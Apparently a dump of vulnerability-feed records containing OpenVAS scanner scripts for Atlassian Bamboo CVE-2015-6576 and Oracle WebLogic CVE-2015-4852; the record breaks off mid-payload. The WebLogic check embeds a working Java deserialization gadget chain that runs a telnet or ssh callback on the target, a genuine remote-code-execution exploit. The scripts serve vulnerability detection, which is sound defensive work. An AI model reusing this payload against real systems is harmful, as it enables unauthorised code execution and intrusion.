09:42:02Z mmartin $\n#\n# Atlassian Bamboo Remote Code Execution\n#\n# Authors:\n# Jan Philipp Schulte <jan.schulte@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113012\");\n script_version(\"$Revision: 11863 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 11:42:02 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-10-11 10:01:18 +0200 (Wed, 11 Oct 2017)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2015-6576\");\n\n script_name(\"Atlassian Bamboo Remote Code Execution\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_atlassian_bamboo_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"AtlassianBamboo/Installed\");\n\n script_tag(name:\"summary\", value:\"Bamboo 2.2 before 5.8.5 and 5.9.x before 5.9.7 allows remote attackers with access to the Bamboo web interface to execute arbitrary Java code via an unspecified resource.\");\n script_tag(name:\"vuldetect\", value:\"Checks if the vulnerable version is present on the host.\");\n script_tag(name:\"impact\", value:\"Successful exploitation would allow the attacker to execute arbitrary Java code on the host and possibly gain control over it.\");\n script_tag(name:\"affected\", value:\"Atlassian Bamboo versions 2.2 through 5.8.4 and 5.9.x before 5.9.7\");\n script_tag(name:\"solution\", value:\"Update to version 5.8.5 or version 5.9.7 respectively.\");\n\n script_xref(name:\"URL\", value:\"https://jira.atlassian.com/browse/BAM-16439\");\n script_xref(name:\"URL\", value:\"https://confluence.atlassian.com/bamboo/bamboo-security-advisory-2015-10-21-785452575.html\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:atlassian:bamboo\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( !port = get_app_port( cpe: CPE ) ) {\n exit( 0 );\n}\n\nif( !version = get_app_version( cpe: CPE, port: port ) ) {\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"2.2\", test_version2: \"5.8.4\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"5.8.5\" );\n security_message( port: port, data: report );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"5.9.0\", test_version2: \"5.9.6\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"5.9.7\" );\n security_message( port: port, data: report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-04-29T22:16:48", "description": "Oracle WebLogic Server is prone to a remote code-execution vulnerability.", "cvss3": {}, "published": "2016-07-27T00:00:00", "type": "openvas", "title": "Oracle WebLogic Server Java Deserialization Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-4852"], "modified": "2020-04-23T00:00:00", "id": "OPENVAS:1361412562310105829", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105829", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle WebLogic Server Java Deserialization Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:bea:weblogic_server\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105829\");\n script_cve_id(\"CVE-2015-4852\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"2020-04-23T09:54:12+0000\");\n\n script_name(\"Oracle WebLogic Server Java Deserialization Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows attackers to execute arbitrary code\n in the context of the affected application.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a serialized java object which try to open a ssh connection to a random\n port on the scanner and then check for the tcp-syn packet from this connection.\");\n\n script_tag(name:\"insight\", value:\"Unsafe deserialization allows unauthenticated remote attackers to run\n arbitrary code on the Jboss server.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references or vendor advisory for more information.\");\n\n script_tag(name:\"summary\", value:\"Oracle WebLogic Server is prone to a remote code-execution vulnerability.\");\n\n script_tag(name:\"affected\", value:\"Oracle WebLogic Server, versions 10.3.6.0, 12.1.2.0, 12.1.3.0 and 12.2.1.0.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-23 09:54:12 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-07-27 14:18:32 +0200 (Wed, 27 Jul 2016)\");\n script_category(ACT_ATTACK);\n script_family(\"General\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_oracle_weblogic_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"oracle/weblogic/detected\");\n script_require_ports(\"Services/weblogic-t3\", 7001);\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE, service: \"weblogic-t3\" ) )\n exit( 0 );\n\nif( ! soc = open_sock_tcp( port ) )\n exit( 0 );\n\nreq = 't3 12.2.1\\n' +\n 'AS:255\\n' +\n 'HL:19\\n' +\n 'MS:10000000\\n' +\n 'PU:t3://us-l-breens:7001\\n\\n';\n\nsend( socket:soc, data:req );\nbuf = recv( socket:soc, length:128 );\n\nif( \"HELO\" >!< buf ) {\n close( soc );\n exit( 0 );\n}\n\npayload = raw_string(\n0x01,0x65,0x01,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x71,0x00,\n0x00,0xea,0x60,0x00,0x00,0x00,0x18,0x43,0x2e,0xc6,0xa2,0xa6,0x39,0x85,0xb5,0xaf,\n0x7d,0x63,0xe6,0x43,0x83,0xf4,0x2a,0x6d,0x92,0xc9,0xe9,0xaf,0x0f,0x94,0x72,0x02,\n0x79,0x73,0x72,0x00,0x78,0x72,0x01,0x78,0x72,0x02,0x78,0x70,0x00,0x00,0x00,0x0c,\n0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,\n0x00,0x70,0x70,0x70,0x70,0x70,0x70,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x02,0x00,\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x70,0x06,0xfe,0x01,\n0x00,0x00,0xac,0xed,0x00,0x05,0x73,0x72,0x00,0x1d,0x77,0x65,0x62,0x6c,0x6f,0x67,\n0x69,0x63,0x2e,0x72,0x6a,0x76,0x6d,0x2e,0x43,0x6c,0x61,0x73,0x73,0x54,0x61,0x62,\n0x6c,0x65,0x45,0x6e,0x74,0x72,0x79,0x2f,0x52,0x65,0x81,0x57,0xf4,0xf9,0xed,0x0c,\n0x00,0x00,0x78,0x70,0x72,0x00,0x24,0x77,0x65,0x62,0x6c,0x6f,0x67,0x69,0x63,0x2e,\n0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x2e,0x69,0x6e,0x74,0x65,0x72,0x6e,0x61,0x6c,0x2e,\n0x50,0x61,0x63,0x6b,0x61,0x67,0x65,0x49,0x6e,0x66,0x6f,0xe6,0xf7,0x23,0xe7,0xb8,\n0xae,0x1e,0xc9,0x02,0x00,0x09,0x49,0x00,0x05,0x6d,0x61,0x6a,0x6f,0x72,0x49,0x00,\n0x05,0x6d,0x69,0x6e,0x6f,0x72,0x49,0x00,0x0b,0x70,0x61,0x74,0x63,0x68,0x55,0x70,\n0x64,0x61,0x74,0x65,0x49,0x00,0x0c,0x72,0x6f,0x6c,0x6c,0x69,0x6e,0x67,0x50,0x61,\n0x74,0x63,0x68,0x49,0x00,0x0b,0x73,0x65,0x72,0x76,0x69,0x63,0x65,0x50,0x61,0x63,\n0x6b,0x5a,0x00,0x0e,0x74,0x65,0x6d,0x70,0x6f,0x72,0x61,0x72,0x79,0x50,0x61,0x74,\n0x63,0x68,0x4c,0x00,0x09,0x69,0x6d,0x70,0x6c,0x54,0x69,0x74,0x6c,0x65,0x74,0x00,\n0x12,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x53,0x74,0x72,0x69,\n0x6e,0x67,0x3b,0x4c,0x00,0x0a,0x69,0x6d,0x70,0x6c,0x56,0x65,0x6e,0x64,0x6f,0x72,\n0x71,0x00,0x7e,0x00,0x03,0x4c,0x00,0x0b,0x69,0x6d,0x70,0x6c,0x56,0x65,0x72,0x73,\n0x69,0x6f,0x6e,0x71,0x00,0x7e,0x00,0x03,0x78,0x70,0x77,0x02,0x00,0x00,0x78,0xfe,\n0x01,0x00,0x00);\n\npayload += raw_string(\n0xac,0xed,0x00,0x05,0x73,0x72,0x00,0x32,0x73,0x75,0x6e,0x2e,0x72,0x65,0x66,0x6c,\n0x65,0x63,0x74,0x2e,0x61,0x6e,0x6e,0x6f,0x74,0x61,0x74,0x69,0x6f,0x6e,0x2e,0x41,\n0x6e,0x6e,0x6f,0x74,0x61,0x74,0x69,0x6f,0x6e,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,\n0x69,0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x55,0xca,0xf5,0x0f,0x15,0xcb,\n0x7e,0xa5,0x02,0x00,0x02,0x4c,0x00,0x0c,0x6d,0x65,0x6d,0x62,0x65,0x72,0x56,0x61,\n0x6c,0x75,0x65,0x73,0x74,0x00,0x0f,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x75,0x74,0x69,\n0x6c,0x2f,0x4d,0x61,0x70,0x3b,0x4c,0x00,0x04,0x74,0x79,0x70,0x65,0x74,0x00,0x11,\n0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x43,0x6c,0x61,0x73,0x73,\n0x3b,0x78,0x70,0x73,0x7d,0x00,0x00,0x00,0x01,0x00,0x0d,0x6a,0x61,0x76,0x61,0x2e,\n0x75,0x74,0x69,0x6c,0x2e,0x4d,0x61,0x70,0x78,0x72,0x00,0x17,0x6a,0x61,0x76,0x61,\n0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x72,0x65,0x66,0x6c,0x65,0x63,0x74,0x2e,0x50,0x72,\n0x6f,0x78,0x79,0xe1,0x27,0xda,0x20,0xcc,0x10,0x43,0xcb,0x02,0x00,0x01,0x4c,0x00,\n0x01,0x68,0x74,0x00,0x25,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,\n0x72,0x65,0x66,0x6c,0x65,0x63,0x74,0x2f,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,\n0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x3b,0x78,0x70,0x73,0x71,0x00,0x7e,\n0x00,0x00,0x73,0x72,0x00,0x2a,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,0x65,\n0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,0x74,\n0x69,0x6f,0x6e,0x73,0x2e,0x6d,0x61,0x70,0x2e,0x4c,0x61,0x7a,0x79,0x4d,0x61,0x70,\n0x6e,0xe5,0x94,0x82,0x9e,0x79,0x10,0x94,0x03,0x00,0x01,0x4c,0x00,0x07,0x66,0x61,\n0x63,0x74,0x6f,0x72,0x79,0x74,0x00,0x2c,0x4c,0x6f,0x72,0x67,0x2f,0x61,0x70,0x61,\n0x63,0x68,0x65,0x2f,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2f,0x63,0x6f,0x6c,0x6c,\n0x65,0x63,0x74,0x69,0x6f,0x6e,0x73,0x2f,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,\n0x6d,0x65,0x72,0x3b,0x78,0x70,0x73,0x72,0x00,0x3a,0x6f,0x72,0x67,0x2e,0x61,0x70,\n0x61,0x63,0x68,0x65,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,\n0x6c,0x65,0x63,0x74,0x69,0x6f,0x6e,0x73,0x2e,0x66,0x75,0x6e,0x63,0x74,0x6f,0x72,\n0x73,0x2e,0x43,0x68,0x61,0x69,0x6e,0x65,0x64,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,\n0x72,0x6d,0x65,0x72,0x30,0xc7,0x97,0xec,0x28,0x7a,0x97,0x04,0x02,0x00,0x01,0x5b,\n0x00,0x0d,0x69,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,0x72,0x73,0x74,\n0x00,0x2d,0x5b,0x4c,0x6f,0x72,0x67,0x2f,0x61,0x70,0x61,0x63,0x68,0x65,0x2f,0x63,\n0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2f,0x63,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,0x6f,\n0x6e,0x73,0x2f,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,0x72,0x3b,0x78,\n0x70,0x75,0x72,0x00,0x2d,0x5b,0x4c,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,\n0x65,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,\n0x74,0x69,0x6f,0x6e,0x73,0x2e,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,\n0x72,0x3b,0xbd,0x56,0x2a,0xf1,0xd8,0x34,0x18,0x99,0x02,0x00,0x00,0x78,0x70,0x00,\n0x00,0x00,0x05,0x73,0x72,0x00,0x3b,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,\n0x65,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,\n0x74,0x69,0x6f,0x6e,0x73,0x2e,0x66,0x75,0x6e,0x63,0x74,0x6f,0x72,0x73,0x2e,0x43,\n0x6f,0x6e,0x73,0x74,0x61,0x6e,0x74,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,\n0x65,0x72,0x58,0x76,0x90,0x11,0x41,0x02,0xb1,0x94,0x02,0x00,0x01,0x4c,0x00,0x09,\n0x69,0x43,0x6f,0x6e,0x73,0x74,0x61,0x6e,0x74,0x74,0x00,0x12,0x4c,0x6a,0x61,0x76,\n0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,0x78,0x70,\n0x76,0x72,0x00,0x11,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x52,0x75,\n0x6e,0x74,0x69,0x6d,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n0x78,0x70,0x73,0x72,0x00,0x3a,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,0x65,\n0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,0x74,\n0x69,0x6f,0x6e,0x73,0x2e,0x66,0x75,0x6e,0x63,0x74,0x6f,0x72,0x73,0x2e,0x49,0x6e,\n0x76,0x6f,0x6b,0x65,0x72,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,0x72,\n0x87,0xe8,0xff,0x6b,0x7b,0x7c,0xce,0x38,0x02,0x00,0x03,0x5b,0x00,0x05,0x69,0x41,\n0x72,0x67,0x73,0x74,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,\n0x67,0x2f,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,0x4c,0x00,0x0b,0x69,0x4d,0x65,0x74,\n0x68,0x6f,0x64,0x4e,0x61,0x6d,0x65,0x74,0x00,0x12,0x4c,0x6a,0x61,0x76,0x61,0x2f,\n0x6c,0x61,0x6e,0x67,0x2f,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,0x5b,0x00,0x0b,0x69,\n0x50,0x61,0x72,0x61,0x6d,0x54,0x79,0x70,0x65,0x73,0x74,0x00,0x12,0x5b,0x4c,0x6a,\n0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x43,0x6c,0x61,0x73,0x73,0x3b,0x78,\n0x70,0x75,0x72,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,\n0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,0x90,0xce,0x58,0x9f,0x10,0x73,0x29,0x6c,\n0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x02,0x74,0x00,0x0a,0x67,0x65,0x74,0x52,\n0x75,0x6e,0x74,0x69,0x6d,0x65,0x75,0x72,0x00,0x12,0x5b,0x4c,0x6a,0x61,0x76,0x61,\n0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x43,0x6c,0x61,0x73,0x73,0x3b,0xab,0x16,0xd7,0xae,\n0xcb,0xcd,0x5a,0x99,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x00,0x74,0x00,0x09,\n0x67,0x65,0x74,0x4d,0x65,0x74,0x68,0x6f,0x64,0x75,0x71,0x00,0x7e,0x00,0x1e,0x00,\n0x00,0x00,0x02,0x76,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,\n0x2e,0x53,0x74,0x72,0x69,0x6e,0x67,0xa0,0xf0,0xa4,0x38,0x7a,0x3b,0xb3,0x42,0x02,\n0x00,0x00,0x78,0x70,0x76,0x71,0x00,0x7e,0x00,0x1e,0x73,0x71,0x00,0x7e,0x00,0x16,\n0x75,0x71,0x00,0x7e,0x00,0x1b,0x00,0x00,0x00,0x02,0x70,0x75,0x71,0x00,0x7e,0x00,\n0x1b,0x00,0x00,0x00,0x00,0x74,0x00,0x06,0x69,0x6e,0x76,0x6f,0x6b,0x65,0x75,0x71,\n0x00,0x7e,0x00,0x1e,0x00,0x00,0x00,0x02,0x76,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,\n0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x00,0x00,0x00,0x00,\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x78,0x70,0x76,0x71,0x00,0x7e,0x00,0x1b,0x73,\n0x71,0x00,0x7e,0x00,0x16,0x75,0x72,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,\n0x6c,0x61,0x6e,0x67,0x2e,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,0xad,0xd2,0x56,0xe7,\n0xe9,0x1d,0x7b,0x47,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x01,0x74,0x00);\n\nlport = rand() % 64512 + 1024;\n\nif( host_runs(\"Windows\") == \"yes\" )\n cmd = 'telnet ' + this_host() + ' ' + lport;\nelse\n cmd = 'ssh -q -i /dev/null -p ' + lport + ' ' + this_host();\n\nlen = raw_string( strlen( cmd ) );\n\npayload += len + cmd + raw_string(\n0x74,0x00,0x04,0x65,0x78,0x65,0x63,0x75,0x71,0x00,0x7e,0x00,0x1e,0x00,0x00,0x00,\n0x01,0x71,0x00,0x7e,0x00,0x23,0x73,0x71,0x00,0x7e,0x00,0x11,0x73,0x72,0x00,0x11,\n0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x49,0x6e,0x74,0x65,0x67,0x65,\n0x72,0x12,0xe2,0xa0,0xa4,0xf7,0x81,0x87,0x38,0x02,0x00,0x01,0x49,0x00,0x05,0x76,\n0x61,0x6c,0x75,0x65,0x78,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,\n0x67,0x2e,0x4e,0x75,0x6d,0x62,0x65,0x72,0x86,0xac,0x95,0x1d,0x0b,0x94,0xe0,0x8b,\n0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x01,0x73,0x72,0x00,0x11,0x6a,0x61,0x76,\n0x61,0x2e,0x75,0x74,0x69,0x6c,0x2e,0x48,0x61,0x73,0x68,0x4d,0x61,0x70,0x05,0x07,\n0xda,0xc1,0xc3,0x16,0x60,0xd1,0x03,0x00,0x02,0x46,0x00,0x0a,0x6c,0x6f,0x61,0x64,\n0x46,0x61,0x63,0x74,0x6f,0x72,0x49,0x00,0x09,0x74,0x68,0x72,0x65,0x73,0x68,0x6f,\n0x6c,0x64,0x78,0x70,0x3f,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x77,0x08,0x00,0x00,\n0x00,0x10,0x00,0x00,0x00,0x00,0x78,0x78,0x76,0x72,0x00,0x12,0x6a,0x61,0x76,0x61,\n0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x4f,0x76,0x65,0x72,0x72,0x69,0x64,0x65,0x00,0x00,\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x78,0x70,0x71,0x00,0x7e,0x00,0x3a);\n\npayload += raw_string(\n0xfe,0x01,0x00,0x00,0xac,0xed,0x00,0x05,0x73,0x72,0x00,0x1d,0x77,0x65,0x62,0x6c,\n0x6f,0x67,0x69,0x63,0x2e,0x72,0x6a,0x76,0x6d,0x2e,0x43,0x6c,0x61,0x73,0x73,0x54,\n0x61,0x62,0x6c,0x65,0x45,0x6e,0x74,0x72,0x79,0x2f,0x52,0x65,0x81,0x57,0xf4,0xf9,\n0xed,0x0c,0x00,0x00,0x78,0x70,0x72,0x00,0x21,0x77,0x65,0x62,0x6c,0x6f,0x67,0x69,\n0x63,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x2e,0x69,0x6e,0x74,0x65,0x72,0x6e,0x61,\n0x6c,0x2e,0x50,0x65,0x65,0x72,0x49,0x6e,0x66,0x6f,0x58,0x54,0x74,0xf3,0x9b,0xc9,\n0x08,0xf1,0x02,0x00,0x07,0x49,0x00,0x05,0x6d,0x61,0x6a,0x6f,0x72,0x49,0x00,0x05,\n0x6d,0x69,0x6e,0x6f,0x72,0x49,0x00,0x0b,0x70,0x61,0x74,0x63,0x68,0x55,0x70,0x64,\n0x61,0x74,0x65,0x49,0x00,0x0c,0x72,0x6f,0x6c,0x6c,0x69,0x6e,0x67,0x50,0x61,0x74,\n0x63,0x68,0x49,0x00,0x0b,0x73,0x65,0x72,0x76,0x69,0x63,0x65,0x50,0x61,0x63,0x6b,\n0x5a,0x00,0x0e,0x74,0x65,0x6d,0x70,0x6f,0x72,0x61,0x72,0x79,0x50,0x61,0x74,0x63,\n0x68,0x5b,0x00,0x08,0x70,0x61,0x63,0x6b,0x61,0x67,0x65,0x73,0x74,0x00,0x27,0x5b,\n0x4c,0x77,0x65,0x62,0x6c,0x6f,0x67,0x69,0x63,0x2f,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,\n0x2f,0x69,0x6e,0x74,0x65,0x72,0x6e,0x61,0x6c,0x2f,0x50,0x61,0x63,0x6b,0x61,0x67,\n0x65,0x49,0x6e,0x66,0x6f,0x3b,0x78,0x72,0x00,0x24,0x77,0x65,0x62,0x6c,0x6f,0x67,\n0x69,0x63,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x2e,0x69,0x6e,0x74,0x65,0x72,0x6e,\n0x61,0x6c,0x2e,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x49,0x6e,0x66,0x6f,0x97,0x22,\n0x45,0x51,0x64,0x52,0x46,0x3e,0x02,0x00,0x03,0x5b,0x00,0x08,0x70,0x61,0x63,0x6b,\n0x61,0x67,0x65,0x73,0x71,0x00,0x7e,0x00,0x03,0x4c,0x00,0x0e,0x72,0x65,0x6c,0x65,\n0x61,0x73,0x65,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x74,0x00,0x12,0x4c,0x6a,0x61,\n0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,0x5b,\n0x00,0x12,0x76,0x65,0x72,0x73,0x69,0x6f,0x6e,0x49,0x6e,0x66,0x6f,0x41,0x73,0x42,\n0x79,0x74,0x65,0x73,0x74,0x00,0x02,0x5b,0x42,0x78,0x72,0x00,0x24,0x77,0x65,0x62,\n0x6c,0x6f,0x67,0x69,0x63,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x2e,0x69,0x6e,0x74,\n0x65,0x72,0x6e,0x61,0x6c,0x2e,0x50,0x61,0x63,0x6b,0x61,0x67,0x65,0x49,0x6e,0x66,\n0x6f,0xe6,0xf7,0x23,0xe7,0xb8,0xae,0x1e,0xc9,0x02,0x00,0x09,0x49,0x00,0x05,0x6d,\n0x61,0x6a,0x6f,0x72,0x49,0x00,0x05,0x6d,0x69,0x6e,0x6f,0x72,0x49,0x00,0x0b,0x70,\n0x61,0x74,0x63,0x68,0x55,0x70,0x64,0x61,0x74,0x65,0x49,0x00,0x0c,0x72,0x6f,0x6c,\n0x6c,0x69,0x6e,0x67,0x50,0x61,0x74,0x63,0x68,0x49,0x00,0x0b,0x73,0x65,0x72,0x76,\n0x69,0x63,0x65,0x50,0x61,0x63,0x6b,0x5a,0x00,0x0e,0x74,0x65,0x6d,0x70,0x6f,0x72,\n0x61,0x72,0x79,0x50,0x61,0x74,0x63,0x68,0x4c,0x00,0x09,0x69,0x6d,0x70,0x6c,0x54,\n0x69,0x74,0x6c,0x65,0x71,0x00,0x7e,0x00,0x05,0x4c,0x00,0x0a,0x69,0x6d,0x70,0x6c,\n0x56,0x65,0x6e,0x64,0x6f,0x72,0x71,0x00,0x7e,0x00,0x05,0x4c,0x00,0x0b,0x69,0x6d,\n0x70,0x6c,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x71,0x00,0x7e,0x00,0x05,0x78,0x70,\n0x77,0x02,0x00,0x00,0x78,0xfe,0x00,0xff,0xfe,0x01,0x00,0x00,0xac,0xed,0x00,0x05,\n0x73,0x72,0x00,0x13,0x77,0x65,0x62,0x6c,0x6f,0x67,0x69,0x63,0x2e,0x72,0x6a,0x76,\n0x6d,0x2e,0x4a,0x56,0x4d,0x49,0x44,0xdc,0x49,0xc2,0x3e,0xde,0x12,0x1e,0x2a,0x0c,\n0x00,0x00,0x78,0x70,0x77,0x46,0x21,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n0x09,0x31,0x32,0x37,0x2e,0x30,0x2e,0x31,0x2e,0x31,0x00,0x0b,0x75,0x73,0x2d,0x6c,\n0x2d,0x62,0x72,0x65,0x65,0x6e,0x73,0xa5,0x3c,0xaf,0xf1,0x00,0x00,0x00,0x07,0x00,\n0x00,0x1b,0x59,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,\n0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0x00,0x78,0xfe,0x01,0x00,\n0x00,0xac,0xed,0x00,0x05,0x73,0x72,0x00,0x13,0x77,0x65,0x62,0x6c,0x6f,0x67,0x69,\n0x63,0x2e,0x72,0x6a,0x76,0x6d,0x2e,0x4a,0x56,0x4d,0x49,0x44,0xdc,0x49,0xc2,0x3e,\n0xde,0x12,0x1e,0x2a,0x0c,0x00,0x00,0x78,0x70,0x77,0x1d,0x01,0x81,0x40,0x12,0x81,\n0x34,0xbf,0x42,0x76,0x00,